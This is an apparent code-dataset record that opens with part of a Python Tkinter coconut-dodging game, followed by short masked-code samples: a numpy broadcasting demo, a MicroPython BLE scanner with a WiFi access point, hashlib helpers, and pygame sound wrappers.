(data.player1Y-data.r - scaryBug.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if scaryBug.x>=data.player1X-data.r and \\\r\n scaryBug.x<=data.player1X+data.r:\r\n return True\r\n\r\ndef hitAI2(data, distance):\r\n # check if human controlled player hits drops\r\n for coconut in data.coconutsAI2:\r\n if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=50 \r\n data.coconutsAI2.remove(coconut)\r\n \r\ndef coconutShotAI(data):\r\n if data.winner ==None:\r\n # randomize position of drops off of tree\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition1 +410,0))\r\n if data.time%8 ==0:\r\n xPosition2 = random.randint(0,80)\r\n xPosition3 = random.randint(364, 385)\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition2,0))\r\n data.coconutsAI1.append(Coconuts(xPosition3,0)) \r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition2+410,0))\r\n data.coconutsAI2.append(Coconuts(xPosition3+410,0))\r\n addExtraCoconut(data)\r\n addPowerUpsAI(data)\r\n\r\ndef addExtraCoconut(data):\r\n #adds drops to edges of trees\r\n if data.time % (18) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(344,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(755,0))\r\n if data.time % 37 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n 
data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(755,0))\r\n \r\ndef addPowerUpsAI(data):\r\n #randomly add powerups on tree\r\n if data.time%33 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(755,0))\r\n if data.time %66==0:\r\n side = random.choice(data.sides) \r\n if side == \"l\":\r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(550,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(750,750))\r\n\r\n \r\ndef AIKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"Left\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player2X = 550\r\n elif(event.keysym == \"Right\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player2X = 750\r\n\r\ndef AIMousePressed(event, data): checkHome(event, data)\r\ndef AITimerFired(data):\r\n if data.winner == None:\r\n #want to check hit twice (before & after elements move)\r\n if data.Invincible1 == False:hitAI1(data, 31)\r\n if data.Invincible2 == True: pass\r\n elif data.Invincible2 == False:hitAI2(data, 31)\r\n for coconut in data.coconutsAI1:\r\n if data.pause1Drop == False:coconut.onTimerFired(data)\r\n for coconut in data.coconutsAI2:\r\n if data.pause2Drop == False:coconut.onTimerFired(data)\r\n # second check\r\n if data.Invincible1 == False:hitAI1(data,13)\r\n if data.Invincible2 == True:pass\r\n 
elif data.Invincible2 == False:hitAI2(data,13)\r\n data.player1Y-=data.speedAI\r\n #establishing winer\r\n if data.player1Y < 15 and data.player2Y >15: data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n data.player2Y-=data.speedAI\r\n if data.player2Y < 15 and data.player1Y> 15: data.winner= \"player2\" \r\n if data.player2Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n if data.player1Y < 15 and data.player2Y <15: data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n powerUpAITimerFired(data)\r\n\r\ndef powerUpAITimerFired(data):\r\n #moves both sides symmetrically \r\n for powerUp in data.invincible:\r\n powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:\r\n bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n if data.start1 != None:\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\n\r\ndef AIRedrawAll(canvas, data):\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconutsAI1:\r\n coconut.draw(canvas)\r\n for coconut in data.coconutsAI2:\r\n coconut.draw(canvas)\r\n canvas.create_text(50,40, text = \"Computer\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n AIWinner(canvas, data)\r\n drawHome(canvas, 
data)\r\n\r\ndef AIWinner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"The Computer Won :(\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! You Won!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! 
You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n####################################\r\n# ScoreBoard mode\r\n####################################\r\n\r\ndef scoreboardKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef scoreboardMousePressed(event, data): checkHome(event, data)\r\n\r\ndef scoreboardTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef scoreboardRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.tbgY, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.txtTScore, text=\"Top Scores!\",\r\n font = \"Arial 30 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2, data.S_P, text=\"Score_Player\",\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n drawHome(canvas, data)\r\n #reads file\r\n data.savedScores\r\n data.savedScores=readFile(\"score.txt\")\r\n score=data.savedScores.splitlines()\r\n scores=[]\r\n for line in score:\r\n scores.append(line.split(\",\"))\r\n #sorts scores to find top 5\r\n scores = sorted(scores, key = lambda x: int(x[0]))\r\n top5 = scores[-data.numScores:]\r\n top5.reverse()\r\n for i in range(len(top5)):\r\n canvas.create_text(data.width/2, data.scoreShift+(i*50),\r\n text = top5[i],\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# help mode\r\n####################################\r\n\r\ndef helpKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef helpMousePressed(event, data): checkHome(event, data)\r\n\r\ndef helpTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef helpRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawHome(canvas, data)\r\n\r\n#######################################\r\n# use the run function as-is from 
notes\r\n#######################################\r\n\r\ndef run(width=15000, height=25000):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n redrawAll(canvas, data)\r\n canvas.update() \r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def timerFiredWrapper(canvas, data):\r\n timerFired(data)\r\n redrawAllWrapper(canvas, data)\r\n # pause, then call timerFired again\r\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n data.timerDelay = 100 # milliseconds\r\n # create the root and the canvas\r\n root = Tk()\r\n init(data)\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n timerFiredWrapper(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\nrun(1000, 1000)\r\n",
"step-ids": [
66,
79,
82,
95,
104
]
}
|
[
66,
79,
82,
95,
104
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = np.ones((3, 4))
b = np.ones((4, 1))
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a + b.T
print(d)
<|reserved_special_token_1|>
import numpy as np
a = np.ones((3, 4))
b = np.ones((4, 1))
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a + b.T
print(d)
<|reserved_special_token_1|>
import numpy as np
a = np.ones((3,4))
b = np.ones((4,1))
# a.shape = (3,4)
# b.shape = (4,1)
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a+b.T
print(d)
|
flexible
|
{
"blob_id": "d6213698423902771011caf6b5206dd4e3b27450",
"index": 5753,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\n<mask token>\nprint(d)\n",
"step-3": "<mask token>\na = np.ones((3, 4))\nb = np.ones((4, 1))\nc = np.zeros_like(a)\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\nd = a + b.T\nprint(d)\n",
"step-4": "import numpy as np\na = np.ones((3, 4))\nb = np.ones((4, 1))\nc = np.zeros_like(a)\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\nd = a + b.T\nprint(d)\n",
"step-5": "import numpy as np\n\na = np.ones((3,4))\nb = np.ones((4,1))\n# a.shape = (3,4)\n# b.shape = (4,1)\n\nc = np.zeros_like(a)\n\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\n\nprint(c)\n\nd = a+b.T\nprint(d)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
<|reserved_special_token_0|>
def onDelete(delBT):
print('onDelete')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bt.active(True)
<|reserved_special_token_0|>
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
<|reserved_special_token_0|>
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
<|reserved_special_token_0|>
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
import gc
import network
import lib.gate as gate
import time
from micropython import const
from ubluetooth import BLE
import lib.webserver as webserver
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
import gc
import network
import lib.gate as gate
import time
from micropython import const
from ubluetooth import BLE
import lib.webserver as webserver
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = "{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}".format(m[0],m[1],m[2],m[3],m[4],m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
# A single scan result.
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type,memoryview(addr) , adv_type, rssi,memoryview( adv_data))
for i in addr:
print("{0:x}".format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'\x40\xe8\xe7\x85\x3d\xed')):
print("device found")
elif event == _IRQ_SCAN_DONE:
# Scan duration finished or manually stopped.
print("scan complete")
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print("onDelete")
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid="Test", password="1234",authmode= 0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print("scanning soon")
if time.time() - lastscan > 10:
print("scanning now...")
bt.gap_scan(10000)
lastscan = time.time()
|
flexible
|
{
"blob_id": "99c60befed32a9aa80b6e66b682d9f475e05a8d1",
"index": 2562,
"step-1": "<mask token>\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\n<mask token>\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\n<mask token>\n",
"step-2": "<mask token>\nbt.active(True)\n<mask token>\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\n<mask token>\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\n<mask token>\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-3": "<mask token>\nbt = BLE()\nbt.active(True)\n_IRQ_SCAN_RESULT = const(5)\n_IRQ_SCAN_DONE = const(6)\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\ns = webserver.webserverstart()\nlastscan = 0\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-4": "import gc\nimport network\nimport lib.gate as gate\nimport time\nfrom micropython import const\nfrom ubluetooth import BLE\nimport lib.webserver as webserver\nbt = BLE()\nbt.active(True)\n_IRQ_SCAN_RESULT = const(5)\n_IRQ_SCAN_DONE = const(6)\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\ns = webserver.webserverstart()\nlastscan = 0\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-5": "import gc\r\nimport network\r\nimport lib.gate as gate\r\nimport time\r\nfrom micropython import const\r\nfrom ubluetooth import BLE\r\nimport lib.webserver as webserver\r\n\r\nbt = BLE()\r\nbt.active(True)\r\n\r\n_IRQ_SCAN_RESULT = const(5)\r\n_IRQ_SCAN_DONE = const(6)\r\n\r\ndef byteToMac(addr):\r\n m = memoryview(addr)\r\n a = \"{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}\".format(m[0],m[1],m[2],m[3],m[4],m[5])\r\n return a \r\n\r\ndef handler(event, data):\r\n if event == _IRQ_SCAN_RESULT:\r\n # A single scan result.\r\n addr_type, addr, adv_type, rssi, adv_data = data\r\n print(addr_type,memoryview(addr) , adv_type, rssi,memoryview( adv_data))\r\n for i in addr:\r\n print(\"{0:x}\".format(i))\r\n \r\n print(byteToMac(addr))\r\n if addr == memoryview(bytearray(b'\\x40\\xe8\\xe7\\x85\\x3d\\xed')):\r\n print(\"device found\")\r\n elif event == _IRQ_SCAN_DONE:\r\n # Scan duration finished or manually stopped.\r\n print(\"scan complete\")\r\n pass\r\n\r\ndef onAdd(addBT):\r\n memoryview(addBT)\r\n\r\ndef onDelete(delBT):\r\n print(\"onDelete\")\r\n\r\nbt.irq(handler)\r\n\r\nap = network.WLAN(network.AP_IF)\r\nap.active(True)\r\nap.config(essid=\"Test\", password=\"1234\",authmode= 0)\r\n\r\ns = webserver.webserverstart()\r\n\r\nlastscan = 0\r\nwhile True:\r\n webserver.webserver(s, onAdd, onDelete)\r\n print(\"scanning soon\")\r\n if time.time() - lastscan > 10:\r\n print(\"scanning now...\")\r\n bt.gap_scan(10000) \r\n lastscan = time.time()\r\n \r\n\r\n \r\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
import hashlib
def md5_hexdigest(data):
return hashlib.md5(data.encode('utf-8')).hexdigest()
def sha1_hexdigest(data):
return hashlib.sha1(data.encode('utf-8')).hexdigest()
def sha224_hexdigest(data):
return hashlib.sha224(data.encode('utf-8')).hexdigest()
def sha256_hexdigest(data):
return hashlib.sha256(data.encode('utf-8')).hexdigest()
def sha384_hexdigest(data):
return hashlib.sha384(data.encode('utf-8')).hexdigest()
def sha512_hexdigest(data):
return hashlib.sha512(data.encode('utf-8')).hexdigest()
|
normal
|
{
"blob_id": "35a95c49c2dc09b528329433a157cf313cf59667",
"index": 8955,
"step-1": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\ndef sha512_hexdigest(data):\n return hashlib.sha512(data.encode('utf-8')).hexdigest()\n",
"step-4": "import hashlib\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\ndef sha512_hexdigest(data):\n return hashlib.sha512(data.encode('utf-8')).hexdigest()\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
#!/usr/bin/env python
import pygame
import pygame.mixer as mixer
def pre_init():
mixer.pre_init(22050, -16, 2, 2048)
def init():
mixer.init()
pygame.mixer.set_num_channels(16)
def deinit():
mixer.quit()
class Music (object):
our_music_volume = 0.8
our_current_music = None
def __init__( self, filename = None ):
self.sound = None
self.channel = None
if filename is not None:
self.load( filename )
def load( self, filename ):
self.sound = mixer.Sound( filename )
def play( self, loop = -1 ):
self.sound.set_volume( Music.our_music_volume )
self.channel = self.sound.play( loop )
Music.our_current_music = self.sound
def stop( self ):
self.sound.stop()
def fadeout( self, millisec ):
self.sound.fadeout( millisec )
def is_playing( self ):
return self.channel is not None and self.channel.get_sound() is self.sound
@staticmethod
def set_global_volume( volume ):
assert volume >= 0.0
assert volume <= 1.0
Music.our_music_volume = volume
if Music.our_current_music is not None:
Music.our_current_music.set_volume( volume )
@staticmethod
def get_global_volume():
return Music.our_music_volume
class Sound (object):
our_sound_volume = 0.8
def __init__( self, filename = None ):
self.sound = None
self.channel = None
if filename is not None:
self.load( filename )
def load( self, filename ):
self.sound = mixer.Sound( filename )
def play( self, loop = 0 ):
"""for infiniteloop, set loop to -1"""
self.sound.set_volume( Sound.our_sound_volume )
self.channel = self.sound.play( loop )
def stop( self ):
self.sound.stop()
def fadeout( self, millisec ):
self.sound.fadeout( millisec )
def is_playing( self ):
return self.channel is not None and self.channel.get_sound() is self.sound
@staticmethod
def set_global_volume( volume ):
assert volume >= 0.0
assert volume <= 1.0
Sound.our_sound_volume = volume
@staticmethod
def get_global_volume():
return Sound.our_sound_volume
|
normal
|
{
"blob_id": "2caea9e7bbef99b19ba917995513413385c7abdf",
"index": 9808,
"step-1": "<mask token>\n\n\nclass Music(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
